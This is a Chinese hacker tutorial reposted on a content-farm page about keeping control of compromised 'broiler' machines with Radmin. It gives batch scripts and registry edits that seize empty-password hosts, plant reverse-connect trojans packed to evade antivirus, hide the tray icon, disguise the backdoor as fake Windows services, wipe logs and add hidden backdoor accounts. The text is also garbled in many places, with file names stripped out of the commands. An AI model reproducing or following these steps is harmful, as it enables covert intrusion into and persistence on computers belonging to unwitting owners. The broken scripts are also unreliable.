首页 > 试题

RAdmin 服务端高级配置

更新时间:2025-02-26 04:26:35 阅读: 评论:0

日日清-描写友情的诗句


2023年5月24日发(作者:我读懂了你)

对于4899肉鸡,相信大家都不会陌生吧。radmin远程控制软件最大的优点就是功能齐全,便于操作,能够

躲避一些软件的查杀。实在是居家旅行,杀人灭口,绝好武器。那么……有的朋友要问了多么好的宝马良

驹在哪里可以找到啊?问的好,各大黑客均能下载,童叟无欺啊!(这段对白怎么这么耳熟啊?)

第一章 4899空口令肉鸡争夺战

4899空口令肉鸡是由一些超级菜鸟们用Windows NT/2000 自动攻击探测机对他感兴趣的某段IP细心的,

无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?

忒不讲公德呢?扔也不扔个红的,绿的怎么吃啊?)

既然4899空口令肉鸡这个多,那么偶就先从它的由来说起吧!Windows NT/2000 自动攻击探测机这款扫

描软件不但集成了扫描器的特点,还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的,弱口令的

SA空口令的电脑上传并安装远程图形控制软件Radmin,即把R_

三个文件上传到其电脑系统跟目录%systemroot%system32子目录下,并行运行R_可执行文件。

由于远程上传的Radmin没有经过配置,因此在对方机子的任务栏里出现了Radmin服务程序的托盘(如图

1-1)。这样不就成个此地无银三百两,机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是

把鼠标移动到托盘位置,一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第

一个动作就是把网断了,逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了,他会通过显

示出的IP查到你的电脑或者你用来扫描的肉鸡,这样就大大的不妙了。所以了,这个托盘的隐藏是非常必

要和急切的。

在做我们的工作之前,要做好一些准备活动。首先把4899空口令肉鸡设置上密码,在RadminCMD

件下输入命令r_ /port:520 /pass:hackba /save /silence。有些同僚总是抱怨这个命令不好用,我看

过他们出问题的动画。无论是在CMD命令下或者在运行下输入这个命令都是正确的,而他们出错的原

因就是没有添加参数“/save”保存,和参数“/silence”后台安装。这样设置好连接端口和密码,同道中人就算

“4899空口令扫描器扫到你做的肉鸡也晚了,偶已经添加过密码了,而端口在肉鸡重起后能够修改成功。

接下来我们就要把一个反弹木马放到肉鸡上,以免对方是动态IP,肉鸡就飞掉了。这里我们可以用灰鸽子

VIP或黑洞2004这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳

啊,这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的,这

样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀,还有可能使木马的功能受到影响。对

喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳,然后再加个不知名的壳(ASPack, UPX这些加壳软件

的壳已经被有些杀毒软件列入黑客程序列表了)然后在用几款世面流行的杀毒软件在本地机器事先做个放

杀毒检测。

这样的黑客程序才是我们的杀手锏。

前期工作制作完毕后,您就可以耐心的工作了。为了做到隐藏托盘的目的,偶想了两个办法:

Radmin

HKEY_LOCAL_MACHINESYSTEMRAdmin导出为这个就是绝对符合您意愿的Radmin配置,

上传到对方机器输入命令regedit /s 。这样在机器重起或者您帮助他重起Radmin

务的时候,任务栏里的Radmin托盘就消失了。

第二, 写个批处理文件重新调整Radmin配置。批处理文件内容如下:

echo off

r_ /port:520 /pass:hackba /save /silence

echo Windows Registry Editor Version 5.00 >

echo [HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters] >>

echo "DisableTrayIcon"=hex:01,00,00,00 >>

regedit /s

1 / 7

del

到这里菜鸟的保鸡反击战已经告一段落。刚才我们不是还放了个灰鸽子吗,这样这台肉鸡上就有我们的

两匹宝马良驹了。小样让你跑,还是逃不出如来佛的掌心吧!呵呵,我得意的笑~~~

在长期的摸索研究工作中,偶发现个Windows NT/2000 自动攻击探测机的小BUG。等偶慢慢道来,各位

看官听仔细啊。Radmin 3.0影子版的客户端是Radmin公司开发的,而服务端程序缺因为种种原因,没有和

各位见面。有的说是Radmin公司在开发新的功能,服务端没有开发完;有的说Radmin公司现在只对付费

用户提供服务端,这些偶就不得而知了。可是我们敬爱的影子为我们制造出了“Radmin 3.0服务端其本质

就是2.0版本的部分修改,对其图标做了修改和加壳处理。可是在汉化过程中,不知道什么原因,它在任

务栏里的Radmin托盘变成了一个空白的地方,要是不注意是看不出来的(如图1-21-3。所以了,我们

在运行Windows NT/2000 自动攻击探测机扫描机子的时候,把它同目录下释放出来的R_,替换

3.0版本的R_。这样扫描出来上传图形控制软件的机器,在其任务栏里就出现了一个空白的地

方。当把鼠标点到上面的时候也没有了某某IP正在连接的提示,这样就欺骗了一些机主。呵呵,旁门左道

大家不要见笑啊。可是这个小BUG启发了我的另一个思路,就是把我们的自动运行的配置包

重命名为R_,然后替换掉R_,我们不就有了所以自己的机子了吗?好,说干就干。把

我的Radmin自解压包替换掉R_,可是这回Windows NT/2000 自动攻击探测机就没有了上传成

功的小提示。(如图:1-4(广告过后更精彩)我一直对这个验证方法不甚了解,想找作者问问,可是他老

人家还换QQ了。哪位高手有高见,请不吝赐教,偶的QQ9500142。言归正传,那也难不倒我,我们把

扫描出来有漏洞的所有IP复制到一个文本文件中,用superscan导入IP列表,扫描我设置Radmin服务的

端口,这样被我上传Radmin的机器就都上门报道了。Yeah!(如图:1-5

第二章 Radmin 服务端高级配置

既然我们对Radmin这么情有独钟,那么我们就要打造不死系的超级后门木马。具推断当前安装过Radmin

控制软件的肉鸡占安全性低级的电脑的80%左右,所以我们上传木马之前,要把其系统中可能存在的

Radmin服务停止掉,替换成我们的服务为己所用。绝大部分的安装Radmin的肉鸡都是用的R_

程序。可是种植的原始情况分为两种:

第一 就如上面所说那样,是用Windows NT/2000 自动攻击探测机上传安装的,其安装服务的名称为

“radmm”。启动和停止该服务的命令分别为“net start radmm”“net stop radmm”

第二一些喜欢偷懒的朋友,把自己的Radmin是默认的R_程序,其安装服务的名称为“Remote

Administrator Service”。启动和停止该服务的命令分别为“net start r_rver”“net stop r_rver”

偶发现一个对付这两种配置的小窍门,就是可以用“r_ /start”“r_ /stop”启动和停止服务,

然后我们在替换为自己的配置。

Follow Me

对配置Radmin自解压程序的,我有两个思路可供大家参详,希望对您能配置能够有所启发和帮助.

第一就是替换系统服务的方法。如果您对Windows系统服务的工作机理不甚了解,那么请跳过这里,看接

下来的第二种配置.

1、编写一个批处理文件,命名为

--------------------------------------------

echo off

r_ /stop

--------------------------------------------

这样做是假定肉鸡上已经由黑友安装过Radmin服务,杀无赦。

2、接下来我拿系统的ClipBook服务开刀做下替换。编写一个批处理文件,命名为

--------------------------------------------

2 / 7

echo off

sc stop ClipBook

sc delete ClipBook

sc stop r_rver

del %systemroot%

del %systemroot%

del %systemroot%system32R_

del %systemroot%

del %systemroot%

copy %systemroot%

%systemroot%

copy %systemroot%

%systemroot%

copy %systemroot%

%systemroot%

/install /silence

regedit /s

regedit /s

sc config ClipBook start=auto

sc start ClipBook

sc delete r_rver

del

del

del

cls

del

-f -r

del

del

del

del

--------------------------------------------

注册表文件时服务配置,Sc是微软服务修改程序(比尔其实对我们还满不错的哦,嘿嘿)

是日志清除工具(大家要养成勤扫地的习惯噢!)是关机程序,这个程序无关紧要,关键看您

的性子怎么样了(急性子的黑友建议使用)就是ClipBook服务的描述信息了,要伪装当然要做

的够专业啊。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesClipSrv]

3 / 7

"Description"="启用剪贴簿查看器储存信息并与远程计算机共享。如果此服务终止,剪贴簿查看器

无法与远程计算机共享信息。如果此服务被禁用,任何依赖它的服务将无法启动。"

"DisplayName"="ClipBook"

上面的信息是由原ClipBook服务所对应的注册表键值

[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesClipSrv] 提取出来的。

因为分支包含了部分电脑路径和安全信息,每个电脑都有些许区别,所以把精炼的东西提取出来做为我们

的伪装信息。

然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,

注意那个解压路径写成%systemroot%system32Setup这个目录

步骤1 选择『在当前文件夹中创建』

步骤2 在『解压后运行』输入

步骤3 在『解压前运行』输入

步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命

名自解压缩程序命为

第二就是添加一个完全属于偶嘀服务的方法。

1、编写一个批处理文件,命名为

--------------------------------------------

echo off

r_ /stop

--------------------------------------------

呵呵,安全第一。

2、接下来偶为我亲爱的小马创建个服务。

服务名称:wmipd

显示名称:Windows Management Instrumentation Player Drivers

编写一个批处理文件,命名为

--------------------------------------------

echo off

sc stop r_rver

del %systemroot%

del %systemroot%

del %systemroot%system32R_

/install /silence

regedit /s

net start wmsrv

attrib +r +h %systemroot%

attrib +r +h %systemroot%

attrib +r +h %systemroot%

regedit /s

sc config Windows Management Instrumentation Player Drivers start=auto

sc start Windows Management Instrumentation Player Drivers

sc delete r_rver

4 / 7

del

del

del

cls

del

del

del

--------------------------------------------

注册表文件时服务配置,Sc是微软服务修改程序,是日志清除工具。就是

Windows Management Instrumentation Player Drivers服务的描述信息了,要伪装当然要做的够专业啊。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswmipd]

"Description"="Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协

议服务。"

"DisplayName"="Windows Management Instrumentation Player Drivers"

然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注

意那个解压路径写成%systemroot%system32drivers这个目录

步骤1 选择『在当前文件夹中创建』

步骤2 在『解压后运行』输入

步骤3 在『解压前运行』输入

步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命

名自解压缩程序命为

如果在Radmin服务已经安装的前提下,还可以用把它的服务信息修改了,在这里我就不做演示了,

大家动手做做~~~

优点:

1.在系统服务中看见的是Windows Management Instrumentation Player Drivers服务

(可以自定义)

2.服务说明是 Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协

议服务

3.cmd命令提示符下面,使用net start命令看见的是自启动服务是

Windows Management Instrumentation Player Drivers

4.在进程中看见的是wmsrv(可以自定义,在文件中相应的位置改一下,注意不要和已有的系统进

程起冲突)

第三章 Radmin的访问权限的设置

设置恰当Radmin的访问权限,能够更好的方便在线教学工作的开展,还可以让高手帮

您设置一些东西和远程维护系统,又不会担心别人窥探您的隐私或给下个木马类的好东东。

5 / 7

(呵呵~~~~偶不是贬低高手的道德噢,请高手们别生气~~~

设置Radmin的访问权限的,首先要设置一个登陆用的XXnet ur hackba neugirl /add

用户所属组为ur,这个权限已经够用了。

输入r_ /tup命令调出Radmin服务端设置程序

步骤1 选择『设置参数』,其他参数的配置我在这就不多说了。现在我们关键讲述下『连接确定』的设置

如果是做在线教学工作或远程协助,在这里选择『使用用户许可』---『连接超时自动拒绝』超时时间,

设置的长点。这里我设置为30秒。(如图:3-1

如果您要是在肉鸡上建立的用户,使用远程操作,那么『连接确定』就不要设置了。免得跳出个要求

连接的对话框把管理员吓坏了,这样就不好了。

步骤2 选择『设置密码』---『使用NT用户安全验证』,激活『确定使用』,然后点击『许可』---『添加』

然后会弹出一个『Add ur/group』的会话框,点击左下角的『显示用户』,这样电脑中的所有组和用户都

显示出来了。选中偶刚才新建的hackbaXX,添加到右边的会话框中,在右上角的『存取权利』中选中您

希望为hackba该用户开启的访问权限。(如图:3-2

具体权限分配:

Special access 特殊权限

All access(RTVFC) 所有权限

Full control of screen 完全控制

File transfer 文件传送

View of screen 查看屏幕

Telnet Telnet连接

Redirect 重定向(这个功能偶一直没有找到是控制什么的,请高手赐教)

No access 无权限

然后一路点OK,回到Radmin服务端设置程序后点击『安装程序』,等到安装通知提示服务安装完成后,

CMD命令提示符下输入命令net start r_rver启动服务。

步骤3 样您在客户端连接服务端电脑的时候就弹出『输入NT用户』的对话框,在这里我填写的是用户名:

hackba 密码:neugirl 所属域(这个可以不填写)(如图:3-3

其中Redirect 重定向这个控制什么,偶一直没有弄明白。请请高手赐教。经过妹妹偶做过大量试验证实:

Radmin的访问权限的设置适合于Windows 2000Windows 2003系列各个版本上使用,对于Windows XP

系统Radmin2.13.2版本都不支持。不知为何原因,希望高手能够指点。如果想对远程主机做Radmin

的访问权限配置只要在本地主机事先建立一个XX,然后分配所希望开放的权限,点击『安装程序』,然后

在注册表[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerUrs]分支中就会出现您分配过权限的

XX名,在它的键值中有该用户所属域的“Radmin控制权限把这个注册表文件导入到远程主机中,

然后在其电脑中建立了同用户名的账号,这样就全部搞定了。

有兴趣的朋友还可以建个隐藏账号作为我们的永久后门!

后记:下面还有一个我写的批处理文件,是用来定时运行Radmin程序的,虽然微软公司的系统维护工具

soonsleep都能够定时运行程序,可使用自己写的批处理文件能够达到目的,也是很欣慰的。嘿嘿

这里说明下批处理文件编写的思路:首先查询本机的当前时间,当然把批处理文件放到肉鸡上就能查肉鸡

的时间了。然后把读取的时间暂时存储在内存中,把时间函数拆分为小时分钟两部分,付值到tokens

6 / 7

调用的两个函数中。在t /a mm=%mm%+2一句中添加上你希望延长多久再运行程序。

echo off

color 0A

cls

Rem ===============以下是的内容=================

echo off

echo 正在查询本机的当前时间

echo.

net time 127.0.0.1 /t /y

for /f "tokens=1,2 delims=:" %%i in ("%time%") do t /a hh=%%i & t /a mm=%%j

echo %1当前时间为%hh%:%mm%

t /a mm=%mm%+2

if /i %mm% geq 60 t /a mm=0 & t /a hh=%hh%+1

if /i %hh% geq 24 t /a hh=0

t tm=%hh%:%mm%

echo.

echo 设置启动AT命令运行的时间为%tm%

echo.

at 127.0.0.1 %tm% net stop r_rver

Rem =====================================================

echo ======================================================

echo 魔女の条件---Radmin自启动程序

echo 黑客基地 .hackba.

echo ======================================================

echo 最多再过120秒,Radmin服务就会被启动,请稍侯...

echo 请明智地使用,否则可能导致民事或刑事处罚!

echo 欢迎到黑客基地论坛发表高见或者用QQ联系偶!

echo

echo 所有:魔女の条件

echo QICQ:9500142

echo :luciferhackba.

echo ------------------------------------------------------

在配置Radmin服务端的时候除了对程序的免查杀处理,还有对其程序图标作下修改,建议使用剑鹰文件

合并器或用灰鸽子图标修改器修改成微软系统内部图标。对于Radmin启动隐藏请参见《黑客X档案》第

九期《Radmin之自启动》,风写的这个自启动方法很有见地。

7 / 7

我渴望作文-恋子情节


本文发布于:2023-05-24 04:34:40,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/zhishi/a/88/17453.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:RAdmin 服务端高级配置.doc

本文 PDF 下载地址:RAdmin 服务端高级配置.pdf

标签:radmin
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
Copyright ©2019-2022 Comsenz Inc.Powered by © 实用文体写作网旗下知识大全大全栏目是一个全百科类宝库! 优秀范文|法律文书|专利查询|